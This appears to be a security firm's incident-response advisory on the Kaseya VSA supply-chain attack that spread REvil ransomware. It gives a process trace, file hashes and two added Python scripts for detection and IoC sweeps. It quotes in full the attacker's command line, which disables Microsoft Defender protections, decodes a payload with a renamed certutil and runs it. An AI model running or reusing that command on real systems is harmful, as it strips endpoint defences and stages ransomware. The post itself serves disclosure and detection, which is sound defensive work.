
Urgent Notice: Kaseya Software Supply Chain Attack

Posted by MegaplanIT on 7/2/21 2:10 PM

By: Andrew Haslett

Security Engineer - Incident Response Specialist

Happening Now

We are monitoring a supply-chain attack outbreak using REvil ransomware. At this time it appears to stem from a malicious Kaseya update. A malicious DLL containing the REvil ransomware (C:\Windows\mpsvc.dll) is side-loaded into a legitimate older copy of Microsoft Defender (C:\Windows\MsMpEng.exe) so that the encryption runs from a legitimate-looking process.

The attack chain contains code that attempts to disable Microsoft Defender Real-Time Monitoring, script scanning, Controlled Folder Access and other protections via PowerShell (Set-MpPreference).
Process Trace:
1. C:\windows\msmpeng.exe
2. C:\kworking\agent.exe
3. C:\Windows\SysWOW64\cmd.exe
4. PowerShell command (listed below)
5. AgentMon.exe
6. C:\Windows\System32\services.exe

"c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 4307 > nul & c:\windows\system32\windowspowershell\v1.0\powershell.exe set-mppreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess disabled -EnableNetworkProtection auditmode -Force $true -MAPSReporting disabled -SubmitSamplesConsent neversend & copy-item /Y c:\windows\system32\certutil.exe c:\windows\cert.exe & Write-Output %random% >> c:\windows\cert.exe & c:\windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & remove-item /q $true /f c:\kworking\agent.crt c:\windows\cert.exe & c:\kworking\agent.exe

The Set-MpPreference call in the command above:
• Disables Real-Time Monitoring
• Disables IPS
• Disables cloud lookup (MAPS reporting)
• Disables script scanning
• Disables Controlled Folder Access (ransomware prevention feature)
• Disables Network Protection (audit mode only)
• Stops cloud sample submission
 
agent.crt is dropped by the Kaseya VSA agent. It is then decoded with certutil (the renamed copy, cert.exe) to carve out agent.exe. agent.exe has two files embedded, MsMpEng.exe and mpsvc.dll; the legitimate Windows Defender executable is used to side-load the REvil ransomware.
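As an added example (not MegaplanIT's code or any vendor tooling), the following Python script turns the observations above into detection logic over process-creation telemetry: it parses a Set-MpPreference invocation and lists the protections it switches off, flags certutil -decode including the copy-to-cert.exe variant (the appended random bytes change the copy's hash, so the command pattern rather than the binary's hash is the reliable signal), flags a long loopback ping used as a delay, and flags MsMpEng.exe started from outside its usual directory. The log format and the sample events are constructed stand-ins for Sysmon Event ID 1 / Windows 4688 data, and the expected MsMpEng.exe directories are an assumption to tune for your environment.

```python
"""Detection logic for the behaviour described above. Added example, not
MegaplanIT's code. The log format is a constructed stand-in for
process-creation telemetry (Sysmon Event ID 1 or Windows 4688): one JSON
object per line with 'image', 'parent' and 'cmdline' fields."""
import json
import re

# Set-MpPreference parameters used by the command above, mapped to the
# protection they control and the values that turn that protection off.
DEFENDER_OFF = {
    "disablerealtimemonitoring": ("Real-Time Monitoring", {"$true", "1"}),
    "disableintrusionpreventionsystem": ("IPS", {"$true", "1"}),
    "disableioavprotection": ("IOAV scanning", {"$true", "1"}),
    "disablescriptscanning": ("Script scanning", {"$true", "1"}),
    "enablecontrolledfolderaccess": ("Controlled Folder Access", {"disabled", "auditmode"}),
    "enablenetworkprotection": ("Network Protection", {"disabled", "auditmode"}),
    "mapsreporting": ("Cloud lookup (MAPS)", {"disabled"}),
    "submitsamplesconsent": ("Cloud sample submission", {"neversend"}),
}

# Directories the real MsMpEng.exe normally runs from (assumption; adjust to
# your platform-update layout). C:\Windows\MsMpEng.exe is not one of them.
MSMPENG_DIRS = (
    r"c:\program files\windows defender",
    r"c:\programdata\microsoft\windows defender\platform",
)

PING_SLEEP_THRESHOLD = 60  # this many echo requests is a delay, not a connectivity check


def defender_protections_disabled(cmdline):
    """Return the Defender protections a Set-MpPreference call switches off."""
    lower = cmdline.lower()
    idx = lower.find("set-mppreference")
    if idx < 0:
        return []
    # Only look at this cmdlet's arguments: up to the next '&' in the chain.
    segment = lower[idx + len("set-mppreference"):].split("&", 1)[0]
    disabled = []
    # '-Param value' pairs; a value may not start with '-' so switches such as
    # '-Force' do not swallow the next parameter name.
    for param, value in re.findall(r"-(\w+)\s+([^\s&-][^\s&]*)", segment):
        if param in DEFENDER_OFF:
            name, off_values = DEFENDER_OFF[param]
            if value in off_values:
                disabled.append(name)
    return disabled


def analyze_event(event):
    """Return a list of findings for one process-creation event."""
    findings = []
    cmd = event.get("cmdline", "")
    lower = cmd.lower()
    image = event.get("image", "").lower()

    disabled = defender_protections_disabled(cmd)
    if disabled:
        findings.append("Defender tampering: " + ", ".join(disabled))

    # certutil -decode, including the copy-and-rename variant from the command
    # above (the copy appears in the same command line as the -decode call).
    if "certutil" in lower and "-decode" in lower:
        findings.append("certutil used to decode a payload")

    m = re.search(r"ping\s+127\.0\.0\.1\s+-n\s+(\d+)", lower)
    if m and int(m.group(1)) >= PING_SLEEP_THRESHOLD:
        findings.append(f"ping used as a roughly {m.group(1)}-second delay")

    if image.endswith("\\msmpeng.exe") and not image.startswith(MSMPENG_DIRS):
        findings.append("MsMpEng.exe started outside its normal directory (side-load suspect)")

    return findings


def scan_log(lines):
    """Run analyze_event over JSON log lines; return (image, findings) for hits."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        findings = analyze_event(event)
        if findings:
            hits.append((event["image"], findings))
    return hits


# Constructed sample events modelled on the process trace above.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\SysWOW64\cmd.exe", "parent": "AgentMon.exe",
     "cmdline": (r'"c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 4307 > nul & '
                 r"powershell.exe set-mppreference -DisableRealtimeMonitoring $true "
                 r"-DisableScriptScanning $true -EnableControlledFolderAccess disabled "
                 r"-MAPSReporting disabled -SubmitSamplesConsent neversend -Force $true & "
                 r"copy /Y c:\windows\system32\certutil.exe c:\windows\cert.exe & "
                 r"c:\windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe")},
    {"image": r"C:\Windows\MsMpEng.exe", "parent": r"C:\kworking\agent.exe",
     "cmdline": r"C:\Windows\MsMpEng.exe"},
    {"image": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "parent": r"C:\Windows\System32\services.exe",
     "cmdline": r'"C:\Program Files\Windows Defender\MsMpEng.exe"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "powershell.exe Get-MpPreference"},
]
SAMPLE_LOG = [json.dumps(e) for e in SAMPLE_EVENTS]

if __name__ == "__main__":
    for image, findings in scan_log(SAMPLE_LOG):
        print(image)
        for f in findings:
            print("  -", f)
```

Only the two malicious events produce findings; the legitimate MsMpEng.exe under Program Files and the read-only Get-MpPreference call stay silent, which is the false-positive check worth keeping when tuning this for real telemetry.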
 

Hashes (SHA-256)

agent.exe (dropper): d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
mpsvc.dll: 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
cert.exe: 605045dc7b338492bdc2de5a1c3e01d64d3cc43aed429edbe88ee6f2feba284c
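As an added example (not MegaplanIT's tooling), the following Python script sweeps a directory tree for the hashes published above and for the dropped-file locations named in the write-up. Because the command above appends a random number to the copied certutil before running it, the cert.exe hash can differ from host to host, which is why the sweep also checks the file paths rather than relying on hashes alone. The `root` parameter stands in for the system drive so the sweep can be exercised on a scratch directory; the demo's sample file and its hash are constructed for the demo.

```python
"""IoC sweep for the artefacts described above: SHA-256 matches against the
published hashes plus the dropped-file locations from the write-up. Added
example, not MegaplanIT's tooling. `root` stands in for the system drive."""
import hashlib
import os
import tempfile

# SHA-256 values as published above.
IOC_SHA256 = {
    "d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e": "agent.exe (dropper)",
    "8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd": "mpsvc.dll (REvil)",
    "605045dc7b338492bdc2de5a1c3e01d64d3cc43aed429edbe88ee6f2feba284c": "cert.exe (renamed certutil)",
}

# Dropped-file locations from the write-up, relative to the system drive.
ARTIFACT_PATHS = [
    os.path.join("kworking", "agent.crt"),
    os.path.join("kworking", "agent.exe"),
    os.path.join("Windows", "cert.exe"),
    os.path.join("Windows", "mpsvc.dll"),
    os.path.join("Windows", "MsMpEng.exe"),
]


def sha256_file(path, chunk_size=1 << 20):
    """Hash a file in chunks so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_sweep(root, iocs=IOC_SHA256):
    """Walk `root`; return (path, label) for every file whose SHA-256 is an IoC."""
    matches = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                digest = sha256_file(path)
            except OSError:
                continue  # unreadable or vanished: skip rather than abort the sweep
            if digest in iocs:
                matches.append((path, iocs[digest]))
    return matches


def artifact_sweep(root, relative_paths=ARTIFACT_PATHS):
    """Return the dropped-file locations that exist under `root`."""
    return [os.path.join(root, rel) for rel in relative_paths
            if os.path.exists(os.path.join(root, rel))]


def demo():
    """Run both sweeps on a constructed scratch tree; return (hash hits, path hits)."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "Windows"))
        os.makedirs(os.path.join(root, "kworking"))
        sample = os.path.join(root, "kworking", "agent.crt")
        with open(sample, "wb") as f:
            f.write(b"constructed sample, not the real dropper")
        with open(os.path.join(root, "Windows", "notepad.exe"), "wb") as f:
            f.write(b"benign placeholder")
        # Constructed IoC entry: the sample file's own hash, labelled as such,
        # on top of the published set (which the scratch files will not match).
        demo_iocs = dict(IOC_SHA256, **{sha256_file(sample): "constructed test sample"})
        return hash_sweep(root, demo_iocs), artifact_sweep(root)


if __name__ == "__main__":
    hash_hits, path_hits = demo()
    for path, label in hash_hits:
        print(f"HASH MATCH {label}: {path}")
    for path in path_hits:
        print(f"ARTIFACT PRESENT: {path}")
```

For a real host, call hash_sweep and artifact_sweep with the system drive as `root`; expect the artifact check to fire before the hash check does, since the hashes above describe one observed run while the paths describe the technique.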
 
We will update as more information becomes available. To read more about this attack: https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/
